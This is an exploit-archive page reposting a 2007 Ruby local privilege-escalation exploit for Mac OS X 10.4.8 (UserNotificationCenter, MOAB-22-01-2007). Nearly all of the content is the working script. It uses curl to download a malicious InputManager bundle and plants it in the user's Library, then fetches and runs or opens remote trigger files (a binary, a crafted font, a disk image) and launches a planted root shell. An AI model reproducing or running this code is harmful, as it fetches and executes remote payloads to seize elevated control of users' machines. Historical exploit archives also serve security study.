首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mac OS X 10.4.8 (UserNotificationCenter) Privilege Escalation Exploit
来源:kf_lists [at] digitalmunition.com 作者:Kevin 发布时间:2007-01-24  

#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#

require 'fileutils'

bugselected = (ARGV[0] || 0).to_i

# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL = "http://www.milw0rm.com/sploits/MOAB-22-01-2007_im.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"

case bugselected
when 0
target_url = "http://projects.info-pull.com/moab/bug-files/notification"
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
when 1
target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
when 2
target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end

CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"

def escalate()
puts "++ Welcome to Pwndertino..."
system CMD_LINE
sleep 5
system "/Users/Shared/shX"
end

escalate()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Vote-Pro 4.0 (poll_frame.php p
·Sami HTTP Server 2.0.1 (HTTP 4
·Oracle 10g SYS.KUPV$FT.ATTACH_
·PA168 Chipset IP Phones Weak S
·Oracle 10g SYS.KUPW$WORKER.MAI
·MS Windows Explorer (AVI) Unsp
·Oracle 10g SYS.DBMS_CDC_IMPDP.
·Xero Portal (phpbb_root_path)
·Microsoft Visual C++ (.RC Reso
·Microsoft Excel Malformed Pale
·VisoHotlink 1.01 functions.vis
·Forum Livre 1.0 (SQL Injection
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved